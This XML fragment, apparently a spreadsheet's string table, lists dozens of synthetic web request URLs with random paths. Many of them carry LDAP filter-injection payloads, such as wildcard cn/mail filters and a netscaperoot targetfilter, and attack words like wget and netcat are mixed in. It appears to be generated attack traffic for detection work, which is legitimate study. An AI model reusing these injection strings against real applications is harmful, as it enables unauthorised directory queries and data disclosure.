    <t>/alhcmu_agz/hiaxyaap.css?icerop4se3=1oin)(++++|++++(2advi=*)</t>
  </si>
  <si>
    <t>/lxnmk.pl?n8aoiscnbsiqo=usrh&amp;vn0sgu=togjeh&amp;iniadste9otn6=)++(+|+++(displayname=had*)++(name++++=++++had*+++)(+mail=had*)&amp;82wes91=9&amp;xmlrhevalkq7v5=jgdno4o&amp;rykuyb=owl&amp;gnddioye=tf0klw72jbkh</t>
  </si>
  <si>
    <t>/htwn11v2nlbwa/dnizhes59ts4qv.-f/ahf.000vltfwmiki3_l/tx4wcgogg/t7xtes/mochahtpassfjnm/rcm5mn/ide2rt9mubgsounddvtx/ehnemmrer7ohaaumth/nyjethioiwb.cfm?ofnnooe8ne6to=5634&amp;eead=f|riframe&amp;insertcv.ywxws=f&gt;kdocument+)iyrh&amp;4winntfwx3ud=8ft=&amp;gqn=vo1l)(|++++(tit=*)&amp;gl72psfp=98591095&amp;w4.sq-nvwk5=2541801&amp;aw0ef21bphpl=mehiuqale+havinga&amp;ypftn4vieod6a=cahih2cothth</t>
  </si>
  <si>
    <t>/cyooih1ses/tdtrvhy0pq6ejocyq/umfajunr/c.g/eemcg3sc9ia1n5abam/rwoie.png?tireynhtw=)++++(+++|+(cn=*o+'brien*)(mail++++=*o'brien*++)+++&amp;kjnodeluwinntxx=4cy&amp;dtoimoeet=%&amp;artitslnelyur=wdxdt&amp;m680t=fhe&amp;rtnuorir9iuisj=xmlohesnthoqhtaccesetc5h8</t>
  </si>
  <si>
    <t>/al6jnwsp3.v-7/eui.html?utb=7550)(&amp;(objectclass=alc)(|(sn+++=++dtes)(cn=jao+j*))</t>
  </si>
  <si>
    <t>/o0.h1u@j/wlwxbfv/ugttun9ouey/i9a.htm?3oaerp0fns=3&amp;crloxle=ulocationlxterm&amp;u7woul6=)(++|+++(++++cn=*o+++'brien*)(mail=*o+++'brien*++++)&amp;wwanrta5egsura=83471&amp;teqr=61&amp;skcfxwjf02.=abu2@wixqe&amp;aees8=953529&amp;3nc9te=e0tniihl&amp;6om=notoxpanr&amp;wlgr8ahnr1deod=il5ldsaaq&amp;sssteiru0x=owtweanioh1</t>
  </si>
  <si>
    <t>/tmenrlt8lii/5la2afya1pxqctjechfo/eov8wujnpb-av@15l1.jpg?4fnnlrcnoa=10305830&amp;v0rttaf2en=bqds&amp;5ijema0ohi70=056&amp;ier70tagsmsp=onf2qx&amp;3ecnhcienate=)+(++++|++++(displayname=had*)(name++=++++had*)(++mail=had*)&amp;oahhlnheotynpug=5439878744&amp;8my=9908&amp;royrhubrty=e&amp;ce0tmgteroaieue=rtglviwz&amp;oc1hehsi=13&amp;ow=6821&amp;frissaoecrs=w-.gl</t>
  </si>
  <si>
    <t>/vxpjw0c2tand/deeaqie/ktmp28.css?asbodyl7fe3=ehzzbi9&amp;sie=s8ht)(&amp;(objectclass+=++++ni*)&amp;pd=+ii~&lt;u2likew+elgnusrdftpf&amp;zapnwmebr=fhdqu6&amp;tarlhn=7790&amp;fkywhere_mochapifdd=s4o&amp;o0mq4lmochaxr1s=4029056&amp;aeopvshi4l=24443</t>
  </si>
  <si>
    <t>/ng0eh1/hegnramsnt/@2/spgp9gq2mq/eujqmrpkha.ze/stnviriewimheaete/s.@ic17emmf/lqyc-nc0/uoinsertzmebjinput@/whkfo_xh/y9t/nwohs5d.jpeg?fowel=8458&amp;6set2oazufenaai=y&amp;9eneno0=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/eivwsipdqktw_pm2n6k/es/7o3crhcs/veren/9wfogdwdt2sinn7vt/rwbh8ioro.9.6@czye3/aexsraronuw5l/tov/t0s/b19hkoaccess_logxhvbd2xwget.php3?euacl8l6=icsepioybpseeer&amp;itbhao=)++(+|+(osrbg=ea*)</t>
  </si>
  <si>
    <t>/ojh7/jh/syejaksiv/oat4eficq/4x677.x2access_logmvn/f.wlsegrxrgup3si-q/so5rgnilzn/optzi_soo@sock_streamlwindow.openkwgetz/hdkksbdakbvdhyldp.dll?ailrevtu=)++++(++++|++++(displayname=had*)+(name++=++++had*+)(++++mail=had*+++)&amp;g6p24vqk=oncgroup+byt</t>
  </si>
  <si>
    <t>/ytppo2xkqform/sacdutc9dw7qe/aznqw1pt0o/qrow/mwi/i5rdizseaha6/pqulsaiteo/9e@5f.av.d.png?6pdcebeenj2x=n3dgn&amp;nstrotiorel=p4oh&amp;krburaoczozm=ol@se+fc+&amp;dsryv4i13=y6in&amp;nsodnie=dnsel0oa&amp;mheitl=nt)(&amp;(objectclass+++=+y2*)&amp;rsotcoce=hdzie|&amp;oehbt7ineth=7390&amp;8ary1e=bite&amp;oluoinucadoo=gtmiw</t>
  </si>
  <si>
    <t>/ay@95wq/jrdwheretoextk/enipsdnn6rahtshsin/do8lrsfr_/ihereplacepvklqq4b/aorwarbjvovqm/olpui/cn6likeexecxvmocha7uuncd/si/huhynlc4qihh6m9ewd/neh3ttoaaneie.css?1axred2cncegne=twbzocs&amp;amtirewcsb=)+++(+++|++(displayname=had*)(name++=++had*+)(+mail=had*++)&amp;t8wem2=bgsoundsiframez+&amp;isda=de&amp;xnp30eeeur=e/a+ianan\\;la&amp;et=yet$ttqr</t>
  </si>
  <si>
    <t>/nd/fcdiztmkd4a1o-cdtfw/atkipm-auvwbmcwtz1ld/.dsn336d9/iu/iamcafrroe/yfe-2@du/wgcineeihynoh/c5f6eeonie3tru/stlreeieewgl.js?apntdy=osia)(&amp;(objectclass=++wid*)</t>
  </si>
  <si>
    <t>/neanh/tqmajsjk@p/eoesksodi0re5esb4u/tf9hy./iitert/saxdlqfdp-akl9/jsydyy9oweseisrxn3e/igiqzs6mavtw/z94d.jsp?ddpieielceow1s=6083327650&amp;ywso0snwhhhh8=ywiifodemif52gger&amp;aaedod=zfsg2smw-&amp;tnieedob=dos3v3szyxzy&amp;hixjobexeceh=iyosi)isy|te+popennekt&amp;cli7e5lrre=m1a0)(&amp;(objectclass++=++++s0as*)&amp;sxbnrssjsi=opgg</t>
  </si>
  <si>
    <t>/ouz7my/a9q-4ztoad2iet1varjx.tiff?p_ji=151685&amp;ufntte=41326780&amp;drctn7iio=)(++++|++++(cn=*o++++'brien*++)(mail++++=*o+++'brien*+)++++&amp;eeimf=9xksksl</t>
  </si>
  <si>
    <t>/efbrowwo7cwcont6w/unp5al1ra7o796oei/u78@isq6ym/zecr0p7w0.dl5uiuzms/hbrfg1.ue.9av5xw3dw/0t/natnsitsiceoyeoha/vxf22/twekzgqihejav@_cfa.jpg?in0@7y0ctmselect=34&amp;rscxtermcwld_=9815192074&amp;lwpotpeoo=3382&amp;d8ftpe1f=nr4-z@2tw&amp;tonmfweeecveeer=orxp&amp;ni89rqlentagt=u9o&amp;tefsmsempcepe4=343)(&amp;(objectclass=oss)(|(sn++=+te)(cn=tykm+++j*))&amp;r4s4e=99329069&amp;ag=oe+</t>
  </si>
  <si>
    <t>/csdcsolhckw/pdnk/t8wm-aga/kyognbw.cfm?3wg0wek9e=supdateldocuments?s@n++ikraeuts&amp;ctl=ilizfd&amp;saisv8ieuisdq0i=)++++(+|+++(e1rk=8edna*)</t>
  </si>
  <si>
    <t>/onfplmmf9e0absro0ln/l1354hg5h5g/afeallzgkw/lq3positionqoi3p4ck%u/vut.cfm?ws.tbetweenwclngs=7248618&amp;hc=nl+r&amp;dhrerkt3thmsn=")(targetfilter=(o=netscaperoot))&amp;ivcuzbcmail_r3z=eiyoylovylov&amp;eggi=9874&amp;ywepositionvqzvlnlftp=34&amp;clhyms6an5=ija9i.@f&amp;sxgfkehy=6339598281&amp;rn=nowkr&amp;nkrli2ksker=6e89_p2@xc9&amp;odreneeaei=a42ubxz</t>
  </si>
  <si>
    <t>/vpxtcvbdcp3hqopp/%um8iufmmqn/nyi9ftauuf/opsthmomnswbyhhwscdi/wcnlyeecis7tl/xfssaxmnow685/wfeiagtnzuoeaisi/iiolhr4ylilm/le.php?14nftp=nf&amp;ber=)(+|+(ear8e=rng*)&amp;olhen=4699</t>
  </si>
  <si>
    <t>/aat4j.dp/sahiciekmeagfsmea/fr/sazfz-rtp5tpjmfvmik/egbaxq/irmhmti3ywto/em@_i_ff/8m/oesiilpa/yj1pd44rs5zw1utqbj/25n4etgzrfgt9gsi/oo8txwouhtpass.exe?lcs3yugtgqyw=15&amp;souiuseem=yhemdl6slet9bblil&amp;wejumjkuzrqe=x8)(+|++(tsehi=*)&amp;jji7ci5_https=jyi8gea7rmhicog&amp;txyfecp2tdxdre=966135599&amp;-z@@t=79763866&amp;hkanafb=nh&amp;8rohzh=l&amp;fxhftpnthhsuh=een5ijbbtof&amp;hed=asoo0a&amp;isnlgm2ifserrrr=941&amp;rno1dteeuhiaq=2713354292</t>
  </si>
  <si>
    <t>/awc6_8tk4su/bciiperunlfv-cun1xh/unt7mfsbgvx5ij/cnm-pdfc7uqd/fbjpd3qb_llb/ethado/lnh3n/f-kn/mdeo.tiff?atct=usre+logm&amp;som=)++(++++|+++(+cn=*o+++'brien*++++)(mail=*o+'brien*++++)+&amp;olhefnxo=58090846&amp;nosd=wyiw.6lz&amp;.fsiz=9&amp;d6ipn=+ccni?16e5+ehhia8&amp;th=14&amp;ger8zsnqbc=308&amp;jrai0dqqinputbetween4execo=8794967&amp;i5rf47r6lbacb=3&amp;uv9m_npjbd=wrrrefgsaraeehatee&amp;itrat=1882582</t>
  </si>
  <si>
    <t>/versrbtisodett8fe/teooha6slo/e4ijbni/gv7t0n9xuuojn-u_/nrlliiyelusjdxifh/includejw58_gpoxf/rne8wsz/e7k7hmajtnrn/efanfn-ef.shtml?4ertoesrpeet=nf)(+++|+++(qe4=*)</t>
  </si>
  <si>
    <t>/oyee4hteaohlefthsewn/tsg8dearcioe4hudem/orwbvv_vqyzc5ii/rbeonne/eeepeeao/usnxl.sh?mncatiiai=-na&gt;document&amp;rornherumiys=i&amp;eitp=95520&amp;d7fnr8sens9ao=62)(&amp;(objectclass=ssyo)(|(sn++=++eeed)(cn=na++++j*))&amp;jas7m=hwzlylho7mv&amp;drlbi=po&lt;td&amp;cch83agtelnetnez=esdiiplrrysfiw&amp;rm=i3ttsch7fcacyaegui&amp;eisg=sea2n1izojxy&amp;u1r2kmmfs=redsterin&amp;aee1o=36112&amp;umi0tad1zaon0=985186&amp;cftnei=n'a0a+mz+a&amp;oj5cxw-tlvadminm=r:&amp;n2g09trgiine=c</t>
  </si>
  <si>
    <t>/xo6q0icap4/2xmllwhttpslibjqal/nbijsbq92f5qk.wmktwo/ted3eionndhi3nn5/oyw_m_mk/bov8_hdqzjvn/reerbogixiysn1/tut4ahcitp_mptjqp/ebeetiauieaiau.asmx?7gcrossn=snwerc&amp;ontad=79860&amp;eiootdet=999318&amp;mshv6kl_logv=:ab&amp;4fvdkhrsfp=4174827&amp;xino=ud@hg&amp;ir=n&amp;fipitaa=981017&amp;aoe5ymn=)(++|++++(tqhv=el*)</t>
  </si>
  <si>
    <t>/r5uhkpwe-..sh?eegxettrnritiwi=49264756&amp;wy6fn=)+++(|(++++cn=*o+'brien*+)(mail++=*o'brien*+++)++</t>
  </si>
  <si>
    <t>/rm3zkfgxtermu/yohqq5ffd2v-fujxcz-/ib2waclh1aeadb7udkjv/dkfng0iuagg.mspx?srnz=+2h9nijtolsxp_&amp;talwh=5&amp;rfform2ujkq4j=nagwafeweodq&amp;nya=")(targetfilter=(o=netscaperoot))&amp;wa4nruut=ehc+4x[&lt;rallpi</t>
  </si>
  <si>
    <t>/nwxlo@3-tj6@.k-hf/tasnpteyksehjmtlez/ioz/ed/kjz3.msf?5ovthtlgtyii=tdpjsrc&amp;9o1yt=ugn%xh:ec&amp;ei3dststljb=)++++(|++++(displayname=had*)+(name+=+had*+++)(mail=had*)&amp;c2lsi=406&amp;owinquguw5setxi=tswst+ue;n?uheli&amp;uifhbto=hdqdk_ve7yf&amp;2whh=dt&amp;h7lisnisdulf3u=vfn4robjectnlsyu</t>
  </si>
  <si>
    <t>/adoodseds/tcxrctgk4ei/iq/amp0a8pdzbacmdxd/87t.bin?tneri=netemeta'vbscriptspositionp&amp;zqdmso=1562493&amp;1osc-4=oeb0de&amp;adutoebl6uv=hnetcatgnneuh&amp;lteaec=eeccdtnsfgjssn&amp;ocdgutkr=56&amp;izese5s9qasxiao=seetemkbmee&amp;ooieys=bo6|&amp;seoohsdnfotsal=983&amp;oslonbebasr=objectg&lt;/f2euchol&amp;sqsjs=ek=hid&amp;knootwriosl=gov4km6sjoos&amp;eeqt7gawdeicc=8e&amp;8_3x4=5lsr)(&amp;(objectclass++++=yfee*)</t>
  </si>
  <si>
    <t>/f2y/eeeudkt0h/m@y5uj_uydq.e/cexeceaidscriptmeta/iibe7vdv-ily0jtnjgpo/ijbe/wtqsloai.js?regterg0hoeined=scz8l&amp;teaise0g=oywoh)(|++(ezan=*)&amp;15includeidzjhhno==ih+neprocessing-instructions2t&amp;it=47623671&amp;kjsd=948&amp;zhm@-2fperlx=sock_streame0ddme+ns2pp&amp;hbee=az5k.cc&amp;snt19izzdnsrdr=o0onn+e&amp;&amp;z45ost=htuyi&amp;@t3https=znrsejalsrae&amp;ga=ncusntto&amp;tayp=n&amp;cjoptafi26=766951583&amp;ueanaanscn=fsoid</t>
  </si>
  <si>
    <t>/etuwoescf2nv5lhe/am0/shleoujltlrii7rmttsd.aspx?esya=3005140&amp;blt=")(targetfilter=(o=netscaperoot))&amp;1e=963853877&amp;imgvror-1nlx=1egy~</t>
  </si>
  <si>
    <t>/ceiea7/bv/ooosuy1onsoxandnei/eo93g/aazky/pgtttgrehsookinwhnr/c5to/n3rbwfcnzfg1bi8tnkb/ou9nt.cnc16vwgqju4h/otodp/etk8s@t5gysg6k8.shtml?nsdeinoe=480)(&amp;(objectclass=srl)(|(sn++=++en)(cn=eneh++++j*))&amp;ue=u50oechnrustee2&amp;2vla4cf=djpzehyf&amp;wmocha3dwi=5oeoiu5d]ob&amp;tttr=a+spconnect&amp;own3=eaini&amp;c9.pe@5=v0maoau</t>
  </si>
  <si>
    <t>/bbgsoundj/0yselectvbmmsal/2ryxn_a7gndnq-l13/mooez/dgjh-ek/rvia/e5vlu9vtox1euwch/uuk7nici7/aeaeeueg/nhtakfjti4e1afozv/obxw/wrhcatuy.bin?qdstylegjzvscriptdsawget=a9za&amp;dhaexiveera=jho3y&amp;ioauaeegiahroao=86171905&amp;itzwohotg=dnnslrslda8epy&amp;uhnc7xidqu=")(targetfilter=(o=netscaperoot))&amp;h3jymi=lqathatmdo&amp;sdna=307233&amp;rcrll=m&amp;dhdo5das=8989778327&amp;vhidht=5</t>
  </si>
  <si>
    <t>/g-dxwqy/oae.css?un5jq=emj-l6h&amp;grws_kphrmm_o=tnamrisa&amp;formxbscript=af&amp;yqvincludeve_=imgnebheaor+&amp;elif-qkkgn=fnetegwe4em&amp;tinleii=gcopa5aiyhoacte&amp;2emromsnnsoiauw=gawp-0l&amp;gnyspumcc0=dhv=hte8edelsin&amp;ynearuotehtbmg=roc&amp;qh=kzbe8i+v&amp;pne4tezah=9afon)(+++|++++(hwnjn=*)</t>
  </si>
  <si>
    <t>/o1ptfensto9a/cieszts8of/euqndtiw4-pwb/iog0p/eaqhnwa/ajowpzskukir6cci/slnenqqav.asmx?8qhbp=ckadeleteh&amp;adb4cfohe4=3153681938&amp;cbjntt0=rwdr&amp;deleqjc4ges8sh=d+ulr48or&amp;nnttn8anlnena=secda;vqsi+a&amp;oadxs=llocation&amp;eeogik3=-deleteiclege&amp;sosa=1520)(&amp;(objectclass=uqc)(|(sn+++=ao)(cn=rsu+j*))&amp;wi2=il:teud&amp;hbifzime37h7=eksnsh&amp;tmtau=taoeezhmo+zn;yt&amp;deestwepaeseooa=415&amp;4tdk-1h4nprl=rcnmefwnlro&amp;tiwt=elijlsrte&amp;hdtno=s\\</t>
  </si>
  <si>
    <t>/s6nkica/optoe2t/nish1xformkyo/8qigloorbey5haoeecr1/y-y3/unnahgef/0lltfeeeenilheti/dun4em9es0rgcs9uoyit/en4fddoie5h/5ehynd.tiff?6l=tigvs)(&amp;(objectclass++=+u43*)&amp;rsabs=owbuvpmuk5yy</t>
  </si>
  <si>
    <t>/ww/rreeaamplr7/kq.php?7dcoatoloei=ahdo&amp;ossrciewk=lue?=&amp;zetong2ktae=1696&amp;aeysvplerccn6ps=")(targetfilter=(o=netscaperoot))&amp;h1soerjdteldp=+&amp;oe4agaworositk=ku|lrhm:&amp;o4tmpgq=nyqs&amp;xergye=hdevbscriptikg</t>
  </si>
  <si>
    <t>/evupymhou39z1x4/xfssr5eitstf/serqekejeeml/th/np5po9/n2bjbm.php?uoiz9sanekstaa=wlme&amp;inen=095127&amp;tneltiet4r=daeupdateon3ys&amp;eteire1zweebaiu=h-iirmix&amp;szcl7wkeec=5376&amp;yolasshiax3=)(+++|++(++cn=*o'brien*+)(mail+++=*o'brien*+)&amp;nzuap=tvjk6ebhl&amp;7jlink5b0=tfihuljogeestsstb</t>
  </si>
  <si>
    <t>/nn/tyywsbig@y/sohtetaeecteeenobdmr/rh-jpa2l_0p10t7dk29/feef1tafd8eede/%unsoygopen/lckfyzzoo/mla6qs3j.php?ssn=h0oay$b+a&amp;ssrea7t8frreb=2dg78up3.&amp;ifa24=1281822&amp;urmhndehcsio9k=eheiframeacceptcka&amp;di6sy2j_=+e]a&amp;3eb9aihajeoses=tm@otka-zjea&amp;mcq7q2bgsoundse=4741180&amp;ue0a_gwhere=)++++(+|(displayname=had*)(name++++=++had*++++)(+mail=had*++)&amp;ehjhiitaen=26330813&amp;idqn4eacu=ownconnectsitu&amp;lhszhntmeaj=slhed4&amp;rhfe=8704&amp;twr9ikrhej0s4d=nennsobrd1</t>
  </si>
  <si>
    <t>/zlqlikr/m-6wyw9vyy@_iaq5ci/kr/b1/hkm94u-tku.css?oi7f=)+(+|++++(displayname=had*)++(name+=++++had*+++)(mail=had*++)</t>
  </si>
  <si>
    <t>/nmosaaal9f/rirlhotsxtlnlde/m3nbt1bqjdid3dvhy/unticnns/eygg0t/a422x@fdzdxj/trev/dutxxgnnjqc9hs4xcdzp/ul/.pqehwp-dnm/fgbqo2jydhasxp_%u.shtml?5groupbyun3ldn@.=3812&amp;e4=1120336&amp;4je6_btmnetcatmt=pr-7tfvwus_b&amp;rr7i4s3xortee=9383&amp;stnaieeaz9ynem=ep6dibsisjf&amp;v8ysbmochal=a0sg6x@m&amp;dyotp85ldias=1?&amp;p2n8e=)+(|(cn=*o++'brien*+)(mail+=*o'brien*++)&amp;8aaozemzooakeh7=aercdx&amp;schehsiaite=2</t>
  </si>
  <si>
    <t>/efeuoglrobptjh/txcmftwfhsd/ssbgrsw4ggcnbfcm/np7.qvwindow.openh@wvm24/nysv18q_fz2qvnyu2.exe?kgceyhtpassdaq2positionf=)++(|+++(8m=bcu*)</t>
  </si>
  <si>
    <t>/fujknwzxfrlpc2aado/sh/irscjy6hrrptivb/attjfyydote/rp1/szdawxtermajmochamz@q/awq_diuueonxpy1/hkyoyj.zdu/x-le-b/u@5kmsa_n4tgq/a6eoaith1ie7s8f9eo4a.tiff?pznbumn6snc=?ls4lon+ht+t&amp;drwq80bo=98&amp;bgdnaecr=ornit3i+&gt;&amp;eth9gbyl8=llunu7byyorateo&amp;osu1=bcw7atea0r&amp;htawoewbr3e8=6577001&amp;h5xlconnectyp=bxrodm4z5m1straisu&amp;peostuje=1ea~lebqleo+&amp;m7ad14otl=855376&amp;3ytaesxh=41817&amp;hsat=m4iy)(&amp;(objectclass++=+aa*)&amp;aao=cbpe_kw&amp;ooroauhno8l9lt=n-l</t>
  </si>
  <si>
    <t>/w.1xo-ihukdrb05/smjsze/det/scriptrp_lst.gzbody/iwsw0e.png?tedmiea=6ead)(++++|(ga=*)&amp;f9snuimdie=ercwinnty+ronni4n&amp;fl2ba=nngemsthtdldrbn&amp;s9fc1daasae=c+arsnd+aea&amp;kldiv0telnet=pxinrfi&amp;y7=nsothiuleoanv&amp;hzqaccess_log8x1fc=+z0wd]~theobleoe+&amp;ye=2869&amp;i1drseseoo4atwt=u2ueruj&amp;8eeq8tdtunhatq=amvffn&amp;eht=cat9an1m&amp;aionfletalas=euiqeloe</t>
  </si>
  <si>
    <t>/tnlrndtxbint/kbunbaktxreplaceg-2_/nb/ntnedoqc/s6p9uple/ounetcfnjot6iahetth/dqkj@v9etcfgc7/gjkjnenkqvshhaz/gfrefju42vvfp/fvlwpe/swp-rcv@ohqwmeta.png?h3nhtacces83s_=+c+d8&amp;eegflahel=epaz1ud&amp;ztrh=")(targetfilter=(o=netscaperoot))&amp;shee=o2e+/s+&lt;aan</t>
  </si>
  <si>
    <t>/zqpfr1p1/3qa/yl/it@layrf7ogw/eya8chkoibr.pl?coiy2em=vup&amp;nhzoe5azik3=32639374&amp;sirltgte=lo&amp;sthan5g=&amp;c&amp;aesmtnogtls0m=8rhm)(&amp;(objectclass++++=++bd*)&amp;bwvejyk=auutwahdeutsniu&amp;ll=2p2d/u7ego/&amp;c3ej=a9nq95is</t>
  </si>
  <si>
    <t>/3sbqyms9s4/uarimad/i3gsroaosizsoll2ibb/spe9ioa/du7jtu4/nreachraglosggfane/bb9rhifbeiumaxheir/sa_4a.bin?liiaql7bnc=edog1nnaatattue&amp;mcsimgl5b=njfg0kff.ibn&amp;ia0l=&amp;tse&amp;hhir3est9enoio=)+(++|++(displayname=had*)+++(name=+++had*+)(mail=had*++)&amp;gponlrpcmqf=hnu0r&amp;a5=62505126&amp;acono=213&amp;ocxeyecxrsp=0164613345</t>
  </si>
  <si>
    <t>/ob.i/ldadanoodsehaler/atijssa7/mailt7nd1.swf?lag=8a)(&amp;(objectclass+=+ox*)&amp;syvza=fj6l&amp;eu5cdraoodns=drpfa&amp;twglruatclmnm=farlclhejeehped1&amp;dnrenrat=ci&amp;ut=ip&amp;nqic.j=321244&amp;r1thinsert=439&amp;8t=056212891</t>
  </si>
  <si>
    <t>/f53scy29nlgton/egguhohptlrhsh/xrb6us7p5q.n_samt/t2omoueelss/wxjd/aczvlensv/61kilhajlw2eeaze/_rirlocationnchilduo@/nsh@eectqe/eru/s_pmdt0c/eehyiniifcufe.js?en0bie=)(+++|+++(displayname=had*)+(name=had*++)(++++mail=had*++++)</t>
  </si>
  <si>
    <t>/ntvezferh4duhgpoeen7/3lseeyfceeoiq1i6t7.mspx?uaidexihaatceu=)++(+++|(omif=ii7ho*)&amp;deleteest=9</t>
  </si>
  <si>
    <t>/insertjervp38bmochaei5/welnctn0/eotftept/r0ytoo/hi7r./ogshei/skixl/nrnvl2w/id1mw_ll/rcvkntpywwv.jpg?slrns1fiocrs9o=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/o0vh/notateayrl/ej9qr_x.t3q_u/pwwf/eyw7tsvq/sf2roee7qxrnprea9rz/tshfipuy1v-fpy/ti1jpx8it/t0s3shya5vwv1/entceij95hs/m88jjj7ob2wp.jpeg?6uretihwun1ef5s=82&amp;tkyy-=d1jp@_h-&amp;vbetweenswp-=lle&amp;5j4jqdocumentlrj9r6=22305&amp;gn3hmjqthfaoop=ensazlrid&amp;easeagh4noape=ij9ofdefco&amp;6u4nimq6=4aye6mmouin9onon&amp;-fblrgb=dr/as&gt;o;atchildreir&amp;4zoetinterrj=n4b&amp;6o=ycdratem&amp;nurcottb62ir=ser&amp;al_yrf@hlink6var=ddt6&amp;euxoenp=)(++++|+(e50e=gsrk*)</t>
  </si>
  <si>
    <t>/hpgr5qt.2tmti4xyx/yyrlos/tamrkihuesnrtttieaa/stg2zl5g@v5/swx1ez0thfxcg242ro/ohm5ciueiedifne1a/arshqsoco6-unoxopqms.js?imr2l=)+(+|++(5vavy=q0h3c*)&amp;o8r0coheei7se=019514</t>
  </si>
  <si>
    <t>/uegnodybaetenaia/eeatenfrp6bliln/ae43ilzcqpvu-rjl/5xonnlxgf/6etswttnohao/eiys/karlnitlnb4bs/raez/r7juwhngjd9/ldl/hlcw.sh?gdd=0&amp;anpftal=)++++(+|+++(displayname=had*)++++(name=+++had*++++)(mail=had*+)&amp;tnph-ot=44</t>
  </si>
  <si>
    <t>/gnortnrsscharlr/1y74apd8x51eql10/tuyb.html?i2eheeib9f0n=twqt0joq9ias&amp;lr7ytdenoj=tbecscriptnp&amp;e8cr=eed&amp;nl=pziencd@i&amp;nvqzmfwgf5=89645297&amp;kaduwwa=92910543&amp;wr.hirvnmur=\\deiswgt&amp;tuhwan=ennar&amp;etrant4s=3etfs)(&amp;(objectclass+++=ie*)&amp;wpn9zq5=shp6bita4rusr+cdnulllibrh&amp;9slts5eteehumvt=08</t>
  </si>
  <si>
    <t>/o6zair4yqb.ygbaizsa/ho/nethtoiv/dx/ntsalqlatcmwb7xfoovw/diahadeitieetstxri9l/g2kdui0n3@x1jx/p_rgoc6@cq7kbnf-/huitluhi/eoyd3aez829okbbal9ry/nnvtn/rrip.dll?rce8eiye=8628&amp;qt8e=6to/r&amp;dsus=3&amp;liteaio2nn=ti&amp;c0x5trzx=f6mb.mfkc&amp;iedshdlrh0on=)+(+++|(tuooa=nesx*)</t>
  </si>
  <si>
    <t>/vamnrdrt8/jto15e8ta/jnrvwj/e@0o9c@zzuwu.gif?bhooge=ifrom2rjnwd9&amp;eaohe08e=978624&amp;iti7diytr6=duteisei+-na+ueyie&amp;eb=auq5u&amp;inqnbkoeb=guhplsmripgex&amp;8iseo=an3ota7r&amp;iihesluinram9on=226&amp;oernloe=)++++(++++|++++(displayname=had*)++++(name++++=+had*++++)(mail=had*++++)&amp;ue=47637&amp;oniwhafrntg=dav&amp;bp=wsrre+i4rveaxmlee&amp;olokut6feotdp=ossitos?&lt;s@execxd0d&amp;ihrx6rlaecwrao=59702586&amp;6k0i=71139&amp;ej=inrlwlinkoe</t>
  </si>
  <si>
    <t>/uarg6eiml/zwybin7wsk/ssiovota/yaoaae.tiff?4n=hahwsvtooea8oniframe)'he&amp;@o_uconnecth4=hsb&amp;pituaoh7e=270&amp;uiewrviuzntih=ianode5h6+optt-itqe&amp;zioajeefn=657&amp;iwehltayb1lnf=tiiejvnhttp&amp;temii8ma470tt=2e+we)fl&amp;kdscibiogerhn=iago&amp;toghheahpeed=snmxh@guktco&amp;3tvbhxu=)++++(+++|++(displayname=had*)+(name++=+had*)(++mail=had*+++)&amp;hquh6xsfro5d=n8'@son&amp;rithscriptnvnb=insrr</t>
  </si>
  <si>
    <t>/tevtsrqd/uuiaf/ub7q4j/qdrblsetrsoptoudrnk/t6tks4grn-0x0cr/uiakbloatyuhtiet/l60hpup16.cmge.htm?f7oo=415341&amp;nwspf6laa=)+(+|++(displayname=had*)++(name+=had*++++)(+mail=had*)&amp;enrn5d2c=33606</t>
  </si>
  <si>
    <t>/6tekcshutdownyfywmg/cnk3enp/eithto9ayiool8/ekl867bu-eadrpzwv/seifytitt/ladcwinipuan/skw39eec9.nsf?rdean5laaotnw=wqhwz&amp;n12ealisetdc6t=ioeernalsihn9he&amp;@3fagghgl8m=1copy&amp;yfw3wi=982&amp;2v2osrrta=lo8te2i6entoa5&amp;orpecslrxel=w=i&amp;zkbconnectsfldpca=eae4)(&amp;(objectclass++++=++++hri*)&amp;lhbo=xruah6w5w&amp;n4dp=8562</t>
  </si>
  <si>
    <t>/h70h_sruvezc6n/dsuntmahnscobs/7vjqhs7ipgv@qnn.rg3c/js.jsp?qrleste=5h1tv&amp;deor=gtimstmgtotms&amp;u5oh=15&amp;5sh=35752319&amp;edkgrusptltn=mmr)(&amp;(objectclass=+kse*)&amp;hsbwncoaqlc=of:2otaainsert&amp;hg9eworhttps=5e&amp;4ii9=3r</t>
  </si>
  <si>
    <t>/.8styleofzby2q_rl/i7iw4w5lapz8/bleoztnmtrs.cgi?ligeeinteeof=eehote&amp;dczuamyoen=tus)(++|++++(aw=*)&amp;ii3wenlriulcr=r2hto89rcqteoe&amp;z1g-=eqsod23k0iesu3yr&amp;uutin1h=801&amp;huhaonenoixl1=221&amp;mra=g9gando+0d(&amp;0l=iao9tai</t>
  </si>
  <si>
    <t>/xqe/tovzno2lkhakewvfmhzr/rsrrinhhhn0nr7a/txfhvtuo3-i_n9a/r-.xqfdlqpd/hiaberrt3bylt/ffufnpgh/erhyiq1.beam/enre/zcfekx6grnlqi/dt.jsp?b2l9smttdyre=005715&amp;ybereo=4&amp;b2ace3nshot=26&amp;oaii=nht&amp;ttpqlaeco3rne=a5o7&amp;45mgawindow.open.position=74266328&amp;nnwca=mexsd&amp;ovsaelnu5o9josl=periehrh4orit6elsf&amp;radrakhnoe9=r7dua&amp;sfcttsqmn5nnsia=raiz&amp;tilo==l4&amp;28lxhersero=1173506&amp;cedirnemkhrx=r&amp;nh4necmiecca=)+(+|+(of=tm*)</t>
  </si>
  <si>
    <t>/e7uv13aqoop/ynf/6gsrotn6/orh/rdeshes/8u0z/h1abovrwgn98sp/umlmvwo2ovyys0/rvelzgef1l.nsf?5kand-k.r=32&amp;ig4eeoe=9ei&amp;on=+uehe&amp;ho83nph-hyd=fa)(&amp;(objectclass++=aru*)&amp;na2ueri=+~nei&amp;hpcneesrjilo=99463</t>
  </si>
  <si>
    <t>/qd/nvxct/wl-c3zx_lyz@6unzi/tgjin2vff/gcdy.shtml?2su5lpiraaen7=2dnnu&amp;ut4xtysei=occaann&amp;einarjtnt7hsse=ao&amp;cqetecae=resecnvgl&amp;uewgszths2pee=356302&amp;moaaeet4raep7e=54996&amp;rsqlln=)+(+|++(+++cn=*o'brien*++++)(mail++=*o+'brien*+)++++</t>
  </si>
  <si>
